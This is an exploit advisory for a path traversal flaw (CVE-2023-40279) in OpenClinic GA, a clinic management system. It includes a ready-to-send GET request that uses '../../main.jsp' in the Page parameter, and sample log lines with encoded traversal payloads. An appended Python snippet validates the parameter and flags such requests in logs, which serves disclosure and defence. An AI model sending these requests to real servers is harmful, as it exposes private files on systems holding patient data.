## https://sploitus.com/exploit?id=PACKETSTORM:178041
# Exploit Title: OpenClinic GA 5.247.01 - Path Traversal (Authenticated)  
# Date: 2023-08-14  
# Exploit Author: V. B.  
# Vendor Homepage: https://sourceforge.net/projects/open-clinic/  
# Software Link: https://sourceforge.net/projects/open-clinic/  
# Version: OpenClinic GA 5.247.01  
# Tested on: Windows 10, Windows 11  
# CVE: CVE-2023-40279  
  
# Details  
An issue was discovered in OpenClinic GA version 5.247.01, where an attacker can perform a directory path traversal via the 'Page' parameter in a GET request to 'main.do'. This vulnerability allows for the retrieval and execution of files from arbitrary directories.  
  
# Proof of Concept (POC)  
Steps to Reproduce:

1. Crafting the Malicious GET Request:

- Utilize a web browser or a tool capable of sending custom HTTP requests, such as curl or Burp Suite.
- Format the GET request as follows (in this example, `../../main.jsp` is used to attempt directory traversal to access `main.jsp`):

```http
GET /openclinic/main.do?Page=../../main.jsp HTTP/1.1
Host: 192.168.100.5:10088
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Connection: close
Cookie: JSESSIONID=[SESSION ID]
Cache-Control: max-age=0
```
  
2. Confirming the Vulnerability:  
- Send the crafted GET request to the target server.  
- If the server responds with the content of the requested file (e.g., `main.jsp`) from outside the intended directory, it confirms the presence of a directory path traversal vulnerability.  
- This vulnerability can lead to sensitive information disclosure or more severe attacks.
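As an added defensive example (not part of the advisory or of OpenClinic GA's own code), the snippet below shows how a `Page` parameter should be resolved so that `../../main.jsp` and its URL-encoded or backslash forms cannot leave the intended directory, and runs the same check over constructed access-log lines to flag traversal attempts against `main.do`. The deployment root and the `pages` directory name are assumptions.

```python
import os
import re
from urllib.parse import unquote

# Constructed deployment root for this example; not the product's real layout.
WEB_ROOT = "/opt/tomcat/webapps/openclinic"
# Directory the 'Page' parameter is assumed to address (hypothetical name).
PAGES_DIR = os.path.join(WEB_ROOT, "pages")


def resolve_page(page_param, pages_dir=PAGES_DIR):
    """Return the canonical path for 'Page', or None if it would escape pages_dir.

    Decodes twice so double-encoded dots (%252e) cannot slip through, folds
    backslashes to slashes (the advisory's targets run on Windows), and only
    then joins and normalises, so '../../main.jsp' collapses outside the base.
    """
    decoded = unquote(unquote(page_param)).replace("\\", "/")
    if "\x00" in decoded or not decoded.lower().endswith(".jsp"):
        return None
    base = os.path.normpath(pages_dir)
    candidate = os.path.normpath(os.path.join(base, decoded.lstrip("/")))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


# Matches the Page value of a main.do request inside an access-log line.
PAGE_RE = re.compile(r"main\.do\?(?:[^ ]*&)?Page=([^ &\"]*)", re.IGNORECASE)


def flag_traversal_requests(log_lines):
    """Return (client_ip, raw Page value) for every request resolve_page rejects."""
    hits = []
    for line in log_lines:
        m = PAGE_RE.search(line)
        if m and resolve_page(m.group(1)) is None:
            hits.append((line.split()[0], m.group(1)))
    return hits


# Constructed access-log lines modelled on the advisory's request; not real traffic.
SAMPLE_LOG = [
    '10.0.0.7 - - [14/Aug/2023:10:01:02 +0000] "GET /openclinic/main.do?Page=../../main.jsp HTTP/1.1" 200 5120',
    '10.0.0.7 - - [14/Aug/2023:10:01:05 +0000] "GET /openclinic/main.do?Page=..%2f..%2fmain.jsp HTTP/1.1" 200 5120',
    '10.0.0.9 - - [14/Aug/2023:10:02:00 +0000] "GET /openclinic/main.do?Page=patient/search.jsp HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    for ip, value in flag_traversal_requests(SAMPLE_LOG):
        print(f"traversal attempt from {ip}: Page={value}")
```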